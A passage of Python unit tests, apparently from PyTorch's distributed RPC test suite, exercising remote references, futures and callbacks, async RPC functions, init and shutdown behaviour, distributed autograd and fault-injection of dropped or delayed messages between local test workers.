b.other = a
n = self.rank
a.rref = rpc.remote(
dst_worker_name,
torch.add,
args=(torch.ones(n, n), 2)
)
@dist_init(setup_rpc=False)
def test_use_rref_after_shutdown(self):
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
# pass in graceful=True to ensure that local UserRRefs are deleted.
rpc.shutdown(graceful=True)
with self.assertRaisesRegex(
RuntimeError, "Cannot call to_here\\(\\) on it after deletion."
):
rref.to_here()
with self.assertRaisesRegex(
RuntimeError, "Cannot call fork an UserRRef after deletion."
):
import torch.distributed.rpc.internal as internal
internal.serialize(rref)
@staticmethod
def _return_gpu_tensor():
return torch.rand(3, 3).cuda(0)
@staticmethod
def _return_gpu_tensor_list():
return [torch.rand(3, 3).cuda(0), torch.rand(3, 3).cuda(1)]
@staticmethod
def _gpu_tensor_list_arg(tensor_list):
return torch.rand(3, 3)
def _create_rref(self):
owner_rank = (self.rank + 2) % self.world_size
return rpc.remote(
worker_name(owner_rank),
torch.add,
args=(torch.zeros(2, 2), 1)
)
@dist_init
def test_user_rrefs_confirmed(self):
dst_rank = (self.rank + 1) % self.world_size
rref = self._create_rref()
ret = rpc.rpc_sync(
worker_name(dst_rank),
check_rref_confirmed,
args=(rref,)
)
self.assertEqual(ret, True)
@dist_init
def test_user_rrefs_confirmed_remote(self):
dst_rank = (self.rank + 1) % self.world_size
rref = self._create_rref()
ret_rref = rpc.remote(
worker_name(dst_rank),
check_rref_confirmed,
args=(rref,)
)
self.assertEqual(ret_rref.to_here(), True)
@dist_init
def test_rref_py_pickle_not_supported(self):
local_rref = RRef(35)
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, "Can not pickle rref in python pickler"):
torch.save(local_rref, fname)
@dist_init
def test_remote_throw(self):
rref = rpc.remote(worker_name((self.rank + 1) % self.world_size),
raise_or_inc,
args=(torch.ones(2),))
with self.assertRaisesRegex(Exception, ".*Expected error.*"):
rref.to_here()
@dist_init
def test_non_cont_tensors(self):
if self.rank == 0:
# Create a non-contiguous tensor.
t = torch.rand(5, 5)
t_view = t.narrow(1, 2, 2)
self.assertFalse(t_view.is_contiguous())
t_cont = t_view.contiguous()
self.assertTrue(t_cont.is_contiguous())
self.assertEqual(t_view, t_cont)
# Send non-cont tensor over RPC.
next_rank = (self.rank + 1) % self.world_size
t_ret = rpc.rpc_sync(worker_name(next_rank), non_cont_test, args=(t_view, t_cont))
# Verify the returned tensor.
self.assertEqual(t_view, t_ret)
self.assertFalse(t_ret.is_contiguous())
@dist_init
def test_callback_simple(self):
set_by_cb = concurrent.futures.Future()
n = self.rank + 1
def callback(fut):
ret = fut.wait()
self.assertEqual(ret, torch.ones(n, n) * 2)
set_by_cb.set_result(ret.clone() + 1)
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
fut.then(callback)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
self.assertEqual(set_by_cb.result(), torch.ones(n, n) * 2 + 1)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_callback_wrong_arg_num(self):
set_by_cb = concurrent.futures.Future()
n = self.rank + 1
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
cb_fut = fut.then(my_function)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
with self.assertRaisesRegex(
RuntimeError,
"my\\_function\\(\\) missing 2 required positional arguments"
):
cb_fut.wait()
@dist_init
def test_callback_wrong_arg_type(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut0 = rpc.rpc_async(dst, torch.add, args=(torch.ones(2, 2), 1))
fut1 = fut0.then(lambda x: x + 1)
with self.assertRaisesRegex(
RuntimeError,
"unsupported operand type\\(s\\) for \\+"
):
fut1.wait()
@dist_init
def test_callback_multi(self):
num_cbs = 10
n = self.rank + 1
def callback(idx, fut):
ret = fut.wait()
self.assertEqual(ret, torch.ones(n, n) * 2)
return ret + idx
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
cb_futs = []
for idx in range(num_cbs):
cb_futs.append(fut.then(partial(callback, idx)))
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
for idx in range(num_cbs):
self.assertEqual(
cb_futs[idx].wait(),
torch.ones(n, n) * 2 + idx
)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_callback_chain(self):
n = self.rank + 1
dst = worker_name(n % self.world_size)
def callback(fut):
return fut.wait() + 1
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), 1)
)
num_cbs = 20
for _ in range(num_cbs):
fut = fut.then(callback)
self.assertEqual(fut.wait(), torch.ones(n, n) + 1 + num_cbs)
@dist_init
def test_callback_in_rpc(self):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst1,
add_use_future_cb,
args=(dst2, torch.ones(2, 2), 1, 2)
)
self.assertEqual(ret, torch.ones(2, 2) + 1 + 2)
@dist_init
def test_callback_with_ret(self):
dst = worker_name((self.rank + 1) % self.world_size)
def callback(fut0):
fut2 = rpc.rpc_async(
dst,
torch.add,
args=(fut0.wait(), 1)
).then(lambda fut1: fut1.wait() + 1)
return fut2.wait()
fut3 = rpc.rpc_async(
dst,
torch.add,
args=(torch.ones(2, 2), 1)
).then(callback)
self.assertEqual(fut3.wait(), torch.ones(2, 2) + 3)
@dist_init
def test_callback_with_error(self):
dst = worker_name((self.rank + 1) % self.world_size)
def callback(fut0):
with self.assertRaisesRegex(ValueError, "Expected error"):
fut0.wait()
raise RuntimeError("Another expected error")
fut1 = rpc.rpc_async(dst, raise_func).then(callback)
with self.assertRaisesRegex(RuntimeError, "Another expected error"):
fut1.wait()
@dist_init
def test_callback_none(self):
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
TypeError,
"incompatible function arguments."
):
rpc.rpc_async(dst, raise_func).then(None)
@dist_init
def test_add_done_callback(self):
set_by_cb = False
n = self.rank + 1
def callback(fut):
nonlocal set_by_cb
fut.wait()
set_by_cb = True
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
fut.add_done_callback(callback)
fut_then = fut.then(lambda _: True)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
# We have no guarantee that the add_done_callback fn will execute before the test finishes.
# Adding a 'then' callback that runs afterwards to guarantee we wait for the first callback
fut_then.wait()
self.assertTrue(set_by_cb)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_mark_future_twice(self):
fut = rpc.rpc_async(
worker_name((self.rank + 1) % self.world_size),
torch.add,
args=(torch.zeros(2, 2), 1)
)
self.assertEqual(fut.wait(), torch.zeros(2, 2) + 1)
with self.assertRaisesRegex(
RuntimeError,
"Future can only be marked completed once"
):
fut.set_result(1)
@dist_init
def test_pickle_future(self):
fut = torch.futures.Future()
errMsg = "Can not pickle torch.futures.Future"
dst = worker_name((self.rank + 1) % self.world_size)
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.rpc_sync(dst, fail_on_fut, args=(fut,))
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.rpc_async(dst, fail_on_fut, args=(fut,))
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.remote(dst, fail_on_fut, args=(fut,))
@dist_init
def test_future_done(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, torch.add, args=(torch.zeros(2), 1))
fut.wait()
self.assertTrue(fut.done())
@dist_init
def test_future_done_exception(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, raise_func)
with self.assertRaisesRegex(ValueError, "Expected error"):
fut.wait()
self.assertTrue(fut.done())
def _test_future_cb(self, func):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst1,
func,
args=(dst2, torch.ones(2, 2), 1, 2)
)
self.assertEqual(ret, torch.ones(2, 2) + 1 + 2)
@dist_init
def test_future_in_rpc(self):
self._test_future_cb(add_use_future_set_result)
@dist_init
def test_future_nested_callback(self):
self._test_future_cb(add_use_future_nested_cb)
def _test_async_function_raise(self, mode):
with self.assertRaisesRegex(RuntimeError, "Expected error"):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
async_raise_func,
mode
)
@dist_init
def test_async_function_raise(self):
self._test_async_function_raise(RPCExecMode.SYNC)
@dist_init
def test_async_function_raise_async(self):
self._test_async_function_raise(RPCExecMode.ASYNC)
@dist_init
def test_async_function_raise_remote(self):
self._test_async_function_raise(RPCExecMode.REMOTE)
def _test_async_function_wrong_return_type(self, mode):
errMsg = (
"Functions decorated with @rpc\\.async_function must return a "
"torch\\.futures\\.Future object,"
)
with self.assertRaisesRegex(RuntimeError, errMsg):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
async_wrong_type,
mode
)
@dist_init
def test_async_function_wrong_return_type(self):
self._test_async_function_wrong_return_type(RPCExecMode.SYNC)
@dist_init
def test_async_function_wrong_return_type_async(self):
self._test_async_function_wrong_return_type(RPCExecMode.ASYNC)
@dist_init
def test_async_function_wrong_return_type_remote(self):
self._test_async_function_wrong_return_type(RPCExecMode.REMOTE)
@dist_init
def test_async_function_simple(self):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(dst1, async_add, args=(dst2, torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
def _test_async_function(self, fn, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
args = (dst2, torch.ones(2, 2), 1, 2)
ret = self._run_func_in_mode(dst1, fn, mode, args=args)
self.assertEqual(ret, torch.ones(2, 2) + 3)
@dist_init
def test_async_function_with_future_ctor(self):
self._test_async_function(async_add_with_future_ctor)
@dist_init
def test_async_function_with_future_ctor_remote(self):
self._test_async_function(
async_add_with_future_ctor,
RPCExecMode.REMOTE
)
@dist_init
def test_async_function_chained(self):
self._test_async_function(async_add_chained)
@dist_init
def test_async_function_chained_remote(self):
self._test_async_function(async_add_chained, RPCExecMode.REMOTE)
@dist_init
def test_async_function_nested(self):
self._test_async_function(async_add_nested)
@dist_init
def test_async_function_nested_remote(self):
self._test_async_function(async_add_nested, RPCExecMode.REMOTE)
@dist_init
def test_async_static_method(self):
self._test_async_function(AsyncExecutionClass.static_async_add)
@dist_init
def test_async_static_method_remote(self):
self._test_async_function(
AsyncExecutionClass.static_async_add,
RPCExecMode.REMOTE
)
@dist_init
def test_async_class_method(self):
self._test_async_function(AsyncExecutionClass.class_async_add)
@dist_init
def test_async_class_method_remote(self):
self._test_async_function(
AsyncExecutionClass.class_async_add,
RPCExecMode.REMOTE
)
def _test_test_async_class_rref_proxy(self, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
rref = rpc.remote(dst1, AsyncExecutionClass)
x = torch.ones(2, 2)
y = torch.ones(2, 2) + 1
if mode == RPCExecMode.SYNC:
ret = rref.rpc_sync().static_async_add(dst2, x, x, y)
ret += rref.rpc_sync().class_async_add(dst2, x, x, y)
ret += rref.rpc_sync().bound_async_add(dst2, x, x, y)
elif mode == RPCExecMode.ASYNC:
ret = rref.rpc_async().static_async_add(dst2, x, x, y).wait()
ret += rref.rpc_async().class_async_add(dst2, x, x, y).wait()
ret += rref.rpc_async().bound_async_add(dst2, x, x, y).wait()
elif mode == RPCExecMode.REMOTE:
ret = rref.remote().static_async_add(dst2, x, x, y).to_here()
ret += rref.remote().class_async_add(dst2, x, x, y).to_here()
ret += rref.remote().bound_async_add(dst2, x, x, y).to_here()
self.assertEqual(ret, 3 * 4 * x)
@dist_init
def test_async_class_rref_proxy(self):
self._test_test_async_class_rref_proxy()
@dist_init
def test_async_class_rref_proxy_async(self):
self._test_test_async_class_rref_proxy(mode=RPCExecMode.ASYNC)
@dist_init
def test_async_class_rref_proxy_remote(self):
self._test_test_async_class_rref_proxy(mode=RPCExecMode.REMOTE)
def _test_async_function_multi(self, fn, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
num = 20
step = 3
args = (dst2, torch.ones(2, 2), num, step)
ret = self._run_func_in_mode(dst1, fn, mode, args=args)
self.assertEqual(ret, torch.ones(2, 2) + num * step)
@dist_init
def test_async_function_multi_chained(self):
self._test_async_function_multi(async_add_chained_multi)
@dist_init
def test_async_function_multi_chained_async(self):
self._test_async_function_multi(
async_add_chained_multi,
RPCExecMode.ASYNC
)
@dist_init
def test_async_function_multi_chained_remote(self):
self._test_async_function_multi(
async_add_chained_multi,
RPCExecMode.REMOTE
)
@dist_init
def test_async_function_multi_fanout(self):
self._test_async_function_multi(async_add_multi_fanout)
@dist_init
def test_async_function_multi_fanout_async(self):
self._test_async_function_multi(
async_add_multi_fanout,
RPCExecMode.ASYNC
)
@dist_init
def test_async_function_multi_fanout_remote(self):
self._test_async_function_multi(
async_add_multi_fanout,
RPCExecMode.REMOTE
)
def _test_return_future(self, mode):
with self.assertRaisesRegex(
RuntimeError,
"Can not pickle torch.futures.Future"
):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
return_future,
mode
)
@dist_init
def test_return_future(self):
self._test_return_future(RPCExecMode.SYNC)
@dist_init
def test_return_future_async(self):
self._test_return_future(RPCExecMode.ASYNC)
@dist_init
def test_return_future_remote(self):
self._test_return_future(RPCExecMode.REMOTE)
@dist_init
def test_rref_timeout(self):
# This test is similar to ones in FaultyProcessGroupTest, but is meant to be
# run with other backends besides ProcessGroup.
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# 10 ms timeout
rref = rpc.remote(dst_worker, my_sleep_func, args=(2, ), timeout=0.01)
# Future corresponding to the remote creation should time out.
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref._get_future().wait()
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
wait_until_owners_and_forks_on_rank(1, 1, rank=1)
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"init_pg_then_rpc does not work with TCP init, see https://github.com/pytorch/pytorch/issues/41614."
)
def test_init_pg_then_rpc(self):
dist.init_process_group(
backend="gloo",
init_method=self.init_method,
rank=self.rank,
world_size=self.world_size,
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# Test RPC.
next_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(worker_name(next_rank), torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test PG
dist.barrier()
rpc.shutdown()
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"init_rpc_then_pg does not work with TCP init, see https://github.com/pytorch/pytorch/issues/41614."
)
def test_init_rpc_then_pg(self):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
dist.init_process_group(
backend="gloo",
init_method=self.init_method,
rank=self.rank,
world_size=self.world_size,
)
# Test RPC.
next_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(worker_name(next_rank), torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test PG
dist.barrier()
rpc.shutdown()
@dist_init
def test_wait_all_with_exception(self):
futs = []
dst = worker_name((self.rank + 1) % self.world_size)
for _ in range(10):
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
ret = torch.futures.wait_all(futs)
@dist_init
def test_wait_all_with_partial_exception(self):
futs = []
dst = worker_name((self.rank + 1) % self.world_size)
for _ in range(10):
futs.append(rpc.rpc_async(dst, torch.add, args=(torch.ones(2), 1)))
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
ret = torch.futures.wait_all(futs)
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"Test does not work with TCP init, see https://github.com/pytorch/pytorch/issues/46491",
)
def test_init_rpc_twice(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc.shutdown()
# Wait for all init to complete.
dist.barrier()
# Ensure rpc initialization works again.
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# Verify RPCs work after re-init.
dst = worker_name((self.rank + 1) % self.world_size)
rpc.rpc_sync(dst, torch.add, args=(torch.ones(2, 2), 1))
rpc.rpc_sync(dst, foo_add, args=())
rpc.shutdown()
def test_wrong_types(self):
with self.assertRaisesRegex(
TypeError,
"Argument backend must be a member of BackendType",
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend="TENSORPIPE",
)
with self.assertRaisesRegex(
TypeError,
"Argument rpc_backend_options must be an instance of RpcBackendOptions",
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=self.rpc_backend,
rpc_backend_options={"init_method": self.init_method}
)
def test_cannot_infer_backend_from_options(self):
# An exception should be raised if the backend isn't specified but
# options are given which are not an instance of any of the known
# agents' option classes.
rpc_backend_options = FooBackendOptions(self.init_method)
with self.assertRaisesRegex(TypeError, "Could not infer backend for options"):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
# Do _not_ pass backend.
rpc_backend_options=rpc_backend_options,
)
@dist_init
def test_owner_rref_backward(self):
dst = worker_name((self.rank + 1) % self.world_size)
t1 = torch.rand(10, 10, requires_grad=True)
rref = rpc.RRef(t1.sum() + t1.sum())
rref.backward()
expected_grad = torch.ones_like(t1) * 2
self.assertEqual(expected_grad, t1.grad)
with dist_autograd.context() as context_id:
t2 = rpc.rpc_sync(dst, torch.add, args=(t1, t1))
rref = rpc.RRef(t2.sum())
rref.backward(context_id)
self.assertEqual(expected_grad, dist_autograd.get_gradients(context_id)[t1])
# Double backward.
with dist_autograd.context() as context_id:
t2 = rpc.rpc_sync(dst, torch.add, args=(t1, t1))
rref = rpc.RRef(t2.sum())
rref.backward(context_id, retain_graph=True)
rref.backward(context_id)
self.assertEqual(expected_grad * 2, dist_autograd.get_gradients(context_id)[t1])
# Test errors.
with self.assertRaisesRegex(RuntimeError, "tensors does not require grad and does not have a grad_fn"):
rpc.RRef(torch.rand(10)).backward()
with self.assertRaisesRegex(RuntimeError, "grad can be implicitly created only for scalar outputs"):
rpc.RRef(torch.rand(10, requires_grad=True)).backward()
with self.assertRaisesRegex(RuntimeError, "Could not find autograd context with id: 100"):
rpc.RRef(torch.rand(10, requires_grad=True).sum()).backward(100)
with self.assertRaisesRegex(RuntimeError, "RRef should contain a tensor for .backward()"):
rpc.RRef("foo").backward()
@staticmethod
def _sum(x):
return x.sum()
@staticmethod
def _identity(x):
return x
@dist_init
def test_user_rref_backward(self):
dst = worker_name((self.rank + 1) % self.world_size)
t = torch.rand(10, requires_grad=True)
with dist_autograd.context() as context_id:
rref = rpc.remote(dst, RpcTest._sum, args=(t,))
rref.backward(context_id, retain_graph=True)
rref.backward(context_id)
self.assertEqual(torch.ones_like(t) * 2, dist_autograd.get_gradients(context_id)[t])
with dist_autograd.context() as context_id:
rref = rpc.remote(dst, RpcTest._identity, args=("foo",))
with self.assertRaisesRegex(RuntimeError, "RRef should contain a tensor for .backward()"):
rref.backward(context_id)
with self.assertRaisesRegex(RuntimeError, "User RRefs require 'dist_autograd_ctx_id' to be specified"):
rref.backward()
@dist_init(setup_rpc=False)
def test_shutdown_errors(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
if self.rank != 0:
og_func = rpc.api._broadcast_to_followers
og_rref_func = rpc.api._delete_all_user_and_unforked_owner_rrefs
# Monkey-patch _broadcast_to_followers to fail, which would ensure
# _all_gather on leader raises an exception.
def raise_error(sequence_id, objects_map):
og_func(sequence_id, objects_map)
raise RuntimeError('simulation')
# Monkey-patch _delete_all_user_and_unforked_owner_rrefs to fail,
# which would ensure barrier is not called on followers.
def rref_error():
raise RuntimeError('simulation rref')
try:
rpc.api._broadcast_to_followers = raise_error
rpc.api._delete_all_user_and_unforked_owner_rrefs = rref_error
with self.assertRaisesRegex(RuntimeError, 'simulation rref'):
rpc.shutdown()
finally:
rpc.api._broadcast_to_followers = og_func
rpc.api._delete_all_user_and_unforked_owner_rrefs = og_rref_func
else:
with self.assertRaisesRegex(RuntimeError, 'timed out in _all_gather'):
rpc.shutdown()
dist.barrier()
def _trainer_func(self, rref, sparse):
m = MyEmbeddingBagModel(sparse=sparse)
loss_fn = nn.MSELoss()
for i in range(10):
outputs = m(torch.rand(10, 10).long())
loss_fn(outputs, torch.rand(10, 10)).backward()
gradient = list(m.parameters())[0].grad
fut = rref.rpc_async().average(rref, i, gradient)
gradient = fut.wait()
if gradient.is_sparse:
gradient = gradient.to_dense().double()
ps_gradient = rref.rpc_sync().get_gradient(rref)
if ps_gradient.is_sparse:
ps_gradient = ps_gradient.to_dense().double()
self.assertTrue(torch.equal(gradient, ps_gradient))
@dist_init
def test_my_parameter_server(self):
self._my_parameter_server(False)
class CudaRpcTest(RpcAgentTestFixture):
@skip_if_lt_x_gpu(2)
@dist_init
def test_profiler_remote_cuda(self):
if self.rank != 1:
return
dst_cuda_0 = (self.rank + 1) % self.world_size
dst_cuda_1 = (self.rank + 2) % self.world_size
dst_worker_cuda_0 = worker_name(dst_cuda_0)
dst_worker_cuda_1 = worker_name(dst_cuda_1)
with _profile(use_cuda=True) as p:
fut1 = rpc.rpc_async(dst_worker_cuda_0, udf_with_torch_ops, args=(0, ))
fut2 = rpc.rpc_async(dst_worker_cuda_1, udf_with_torch_ops, args=(1, ))
fut1.wait()
fut2.wait()
def get_name(event):
return event.name[event.name.find(REMOTE_OP_STR) + len(REMOTE_OP_STR):]
function_events = p.function_events
for event in function_events:
if event.is_async:
self.assertEqual(0, event.cuda_time_total)
self.assertEqual([], event.kernels)
self.assertEqual(0, event.cuda_time)
else:
if event.node_id == 1:
continue
self.assertTrue(event.node_id in [dst_cuda_0, dst_cuda_1])
if get_name(event) in EXPECTED_REMOTE_EVENTS:
self.assertGreater(event.cuda_time_total, 0)
self.assertEqual(1, len(event.kernels))
kernel = event.kernels[0]
if event.node_id == dst_cuda_0:
self.assertEqual(kernel.device, 0)
if event.node_id == dst_cuda_1:
self.assertEqual(kernel.device, 1)
self.assertGreater(event.cuda_time, 0)
# Validate that EXPECTED_REMOTE_EVENTS is a subset of remotely profiled
# events.
remote_events = [event for event in function_events if event.is_remote]
remote_event_names = [get_name(event) for event in remote_events if get_name(event) in EXPECTED_REMOTE_EVENTS]
self.assertEqual(set(remote_event_names), set(EXPECTED_REMOTE_EVENTS))
class FaultyAgentRpcTest(RpcAgentTestFixture):
# no faulty_messages defined so this fails all retryable messages - see
# faulty_rpc_agent_test_fixture.py for the list of retryable messages.
@dist_init(messages_to_delay={})
def test_check_failed_messages(self):
if self.rank == 0:
dst_worker_b = worker_name((self.rank + 1) % self.world_size)
dst_worker_c = worker_name((self.rank + 2) % self.world_size)
# Worker0 sends RPC to Worker1 and creates an RRef there
rref = rpc.remote(dst_worker_b, torch.add, args=(torch.ones(2, 2), torch.ones(2, 2)))
# Worker0 sends an RPC to Worker2 with the RRef as an arg
rpc.remote(dst_worker_c, add_rref_to_value, args=(rref, torch.ones(2, 2)))
# check if the output is as expected
self.assertEqual(rref.to_here(), torch.add(torch.ones(2, 2), torch.ones(2, 2)))
# explicitly delete all User RRefs
_delete_all_user_and_unforked_owner_rrefs()
@dist_init
def test_verify_backend_options(self):
self.assertEqual(self.rpc_backend, rpc.backend_registry.BackendType.FAULTY_TENSORPIPE)
self.assertEqual(self.rpc_backend_options.num_worker_threads, 8)
self.assertEqual(self.rpc_backend_options.num_fail_sends, 3)
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 4)
self.assertEqual(len(self.rpc_backend_options.messages_to_delay), 2)
self.assertEqual(self.rpc_backend_options.rpc_timeout, rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init(faulty_messages=["RREF_FORK_REQUEST", "RREF_CHILD_ACCEPT"])
def test_custom_faulty_messages(self):
self.assertEqual(
set(["RREF_FORK_REQUEST", "RREF_CHILD_ACCEPT"]),
set(self.rpc_backend_options.messages_to_fail),
)
@dist_init(faulty_messages=[])
def test_no_faulty_messages(self):
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 0)
@dist_init(messages_to_delay={"SCRIPT_CALL": 1.5})
def test_custom_messages_to_delay(self):
self.assertEqual(self.rpc_backend_options.messages_to_delay, {"SCRIPT_CALL": 1.5})
def _test_remote_message_dropped_pickle(self, dst=None):
if self.rank != 0:
return
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# Since we fail python_remote_call messages synchronously, the future
# corresponding to this remote call will be marked with an error when
# this function returns.
rref = rpc.remote(dst_worker, my_sleep_func, args=(1,))
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
# Attempt to fork the RRef should raise an error indicating the rpc.remote timeout.
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref._serialize()
# Test that using RRef as arg over RPC (which forks) results in the same
# error
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rpc.rpc_async(dst_worker, add_rref_to_value, args=(rref, 1))
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_remote_message_dropped_pickle(self):
self._test_remote_message_dropped_pickle()
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_remote_message_dropped_pickle_to_self(self):
self._test_remote_message_dropped_pickle(self.rank)
def _test_remote_message_dropped_timeout(self, func, args, dst=None):
if self.rank != 0:
return
# test the case where rpc.remote() message creation is completely dropped.
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# Since we fail python_remote_call messages synchronously, the future
# corresponding to this remote call will be marked with an error when
# this function returns.
rref = rpc.remote(dst_worker, func, args=args)
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
# Note: during shutdown, logs will indicate "Could not find OwnerRRef..."
# on the owning nodes, this is expected because the OwnerRRef was never
# successfully created. Therefore, delAllUsers will work as expected.
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def test_builtin_remote_message_dropped_timeout(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_dropped_timeout(func, args)
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def test_builtin_remote_message_dropped_timeout_to_self(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_dropped_timeout(func, args, dst=0)
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_udf_remote_message_dropped_timeout(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_dropped_timeout(func, args)
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_udf_remote_message_dropped_timeout_to_self(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_dropped_timeout(func, args, dst=0)
def _test_remote_message_delay_timeout(self, func, args, dst=None):
if self.rank != 0:
return
# Test the case where remote message is eventually processed on the owner,
# but the future on the creator times out before the response comes back.
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# 10 ms timeout
rref = rpc.remote(dst_worker, func, args=args, timeout=0.001)
# Future corresponding to the remote creation should time out.
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref._get_future().wait()
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
# to_here() should now pick up that rpc.remote() creation has failed.
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
# Test the case where rpc.remote() times out, but to_here() has already
# started blocking before.
# NOTE: we only test this when not sending to self, as to_here() calls
# calls localValue(), which does not send an RPC and thus does not have
# a timeout. This can be supported by allowing future.wait() to
# take in an optional timeout (https://github.com/pytorch/pytorch/issues/39280)
if dst_rank != self.rank:
slow_rref = rpc.remote(dst_worker, func, args=args, timeout=2)
with self.assertRaisesRegex(RuntimeError, expected_error):
# to_here() should raise timeout error, since it does not know about the
# status of rpc.remote().
